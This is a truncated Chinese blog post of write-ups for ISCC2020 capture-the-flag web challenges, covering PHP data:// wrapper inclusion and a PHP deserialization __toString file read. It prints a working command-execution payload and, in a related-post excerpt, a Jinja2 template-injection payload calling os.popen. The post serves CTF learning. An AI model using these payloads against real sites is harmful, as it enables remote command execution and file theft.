ISCC2020-Web题解

最新推荐文章于 2023-04-17 22:15:39 发布
最新推荐文章于 2023-04-17 22:15:39 发布
阅读量2.1k 收藏 6
点赞数 1
分类专栏: CTF_Writeup 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/106160356
版权

前言:

Where is file?-1

——php伪协议
在这里插入图片描述
考察的是php伪协议,可以使用data协议来进行读取

?file=data:text/plain,<?echo system('ls')?>

阿森的爱情-1

——签到

扫描一下出一个文件,里面就有flag

Php is the best language

——PHP反序列化、to_string魔法函数的调用

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{
   
    public $file;
    function __toString()      
    {
   
        if(isset($this->file))
        {
   
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
   
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}
if (isset($_GET['data']))
{
   
    $data = $_GET['data'];
        $good = unserialize($data);
        echo $good;
}
else 
{
   
    $url='./index.php';
}

$html='';
if(isset($_POST['test'])){
   
    $s = $_POST['test'];
    $html.="<p>谢谢参与!</p>";
}
?>

代码很简单,就是__toString的调用

<?php  
class baby 
{
   
    public $file;
    function __toString()      
    {
   
        if(isset($this->file))
        {
   
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename))
最低0.47元/天 解锁文章
lemonl1
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ISCC2021 LOCKK题解
LJFYYJ的博客
07-25 1419
变种AES解密 IDA动态调试so
iscc_2018 web题解
Smity的博客
10-25 2218
一切都是套路 开头比较客气,试了.bak .swp .svn都没有出来,结果发现是.txt,还是自己想复杂了 典型的变量覆盖漏洞,不用想了,直接先将flag的值赋给flag的值赋给flag的值赋给_200变量,然后利用die($_200)将flag打印出来。 你能绕过吗 id那里是只允许输入int吧我估计。。。什么十六进制或者其他的字母都认不出来,可能我水平不够想不到其他注入了。 我...
ISCC web题复现
m0_62422842的博客
06-05 1345
第一次参加ISCC线上赛,感觉题目质量还是挺好的,擂台赛都是大佬们的主场,向我这样的小白也只能学学新东西。在此总结做过的web题目以及相关知识点。
ISCC2020练武题Web总结
qwzf
06-06 2744
前言 接下来,继续总结练武题的Web题 Web MISC
ISCC2020部分wp
Atkx's Blog
07-10 817
1. LSB 下载压缩包,解压得到一个图片 用Stegsolve打开,进行异或 在通道为0时发现了异常 将所有通道设为0,然后保存为flag.png 打开图片,发现是二维码 扫描后得到cumtctf{1sb_i4_s0_Ea4y} 2.
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip
ISCC-2020-J07
03-26
ISCC-2020-J07
ISCC-2020-J06
02-14
ISCC-2020-J06
iscc-cli:国际会议
05-09
iscc-cli-命令行工具 一个基于为数字媒体文件创建ISCC代码的命令行工具。目录背景国际标准内容规范是针对分散式内容标识的的提议。 ISCC代码是根据内容本身通过算法生成的,并提供了许多强大的功能,例如内容相似性...
ISCC-2015-细节决定成败.rar
09-30
ISCC-2015-细节决定成败.rar
2020易霖博杯 web wp.md
04-02
2020易霖博杯 web wp. 参照大佬们比较好的思路写的WP 方便学习
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
ISCC(web)暴力破解
Watson的博客
05-23 658
web2 暴力破解 题目地址:http://39.100.83.188:8002 发现这是一个已经给了用户名 只需要破解三位数字密码即可 有验证码需要通过验证码 随便输入一个密码 将验证码输入进去 通过burp抓包然后爆破 如下(输入完之后先不要点击submit) 此时,打开burp,设置好代理(这里不懂的自己查一下burp使用教程,里边有详细介绍) 然后点击submit 你会看到burp...
ISCC2020 擂台题Web总结与复现
qwzf
06-30 650
擂台Web1:Easy Injection 题目难度:简单 考察:python模板注入(jinja2模板注入) 典型的模板注入,无任何过滤,直接构造利用payload: http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }} http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].p
2019_iscc_pwn350
Jc
05-26 495
引 1.这个道题有两个考察点 一个是ret2dl的了解(只要看过这个技术的,都知道哪里只需要拿过来使用就可以了)还有一个就是main函数末尾的堆栈平衡(自己在这里卡了好久) offset 相信解决的offset的大小,这道题有迎刃而解了(先补充一个知识点,对于新手) 1.第一个图是pwn350 第二个图是普通的main函数结尾处 2.IDA手动输入一下,会发现 ...
php反序列化总结(二)
qq_43801002的博客
05-17 504
反序列化与POP CHAIN POP CHAIN:把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与类中的敏感函数和属性相关联,就是POP CHAIN 。此时类中所有的敏感属性都属于可控的。当unserialize()传入的参数可控,便可以通过反序列化漏洞控制POP CHAIN达到利用特定漏洞的效果。 通俗点就是:反序列化中,如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 举一个小例子
BUUCTF解题web十一道(02)
qq_45837896的博客
06-01 992
[RoarCTF 2019]Easy Calc 进入页面,发现,诶还真是一个计算器 输几个数进去,还真能计算,不过2^10算的时候遭到了计算器的抵抗 哈哈哈哈步入正轨 看看源码是有个输入过滤,发现这个计算器在向calc.php传参,我们进去看看 这就是calc.php页面,在这里我们看到了GET传参,还有一个黑名单,这又是正则匹配绕过呀 ...
ctf打卡第7天
jie_a的博客
06-18 214
打开网页,查看源代码是这样的 首先判断是否存在一个$user,并且读取文件===the user is admin 我们可以用php伪协议读取,他就会完整的等于文件内容 php://input 是个可以访问请求的原始数据的只读流. 这题不对劲呢,等会再说 ...
2022-ISCC信息安全与对抗竞赛wp-misc(详解,有脚本( •̀ ω •́ )y)
路baby的博客
04-17 3753
没想到不知不觉一年时间就这样过去了,又到了一年一度的ISCC信息对抗大赛,不知道去年打比赛的小伙伴今年还能不能再碰到,期待与君再相见( •̀ ω •́ )y所以今天就把去年的题目再复现一遍供师傅们参考 嘻嘻目录前言misc(1)2022冬奥会(2)单板小将苏翊鸣(3)隐秘的信息(4)降维打击(5)藏在星空中的诗-1(6)藏在星空中的诗-2(7)真相只有一个(8)小光学AI(9)套中套flag2flag1flag3加油各位( •̀ ω •́ )y 期待与君再相逢。
ISCC where
最新发布
09-08
ISCC是指"Intelligent Self-Configuring Cluster",其中的"ISCC"表示智能自配置集群。在ISCC中,有两种集群形式,一种是分散式集群,另一种是集中式集群。在分散式集群中,每个节点都有潜力成为簇头,而在集中式集群...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值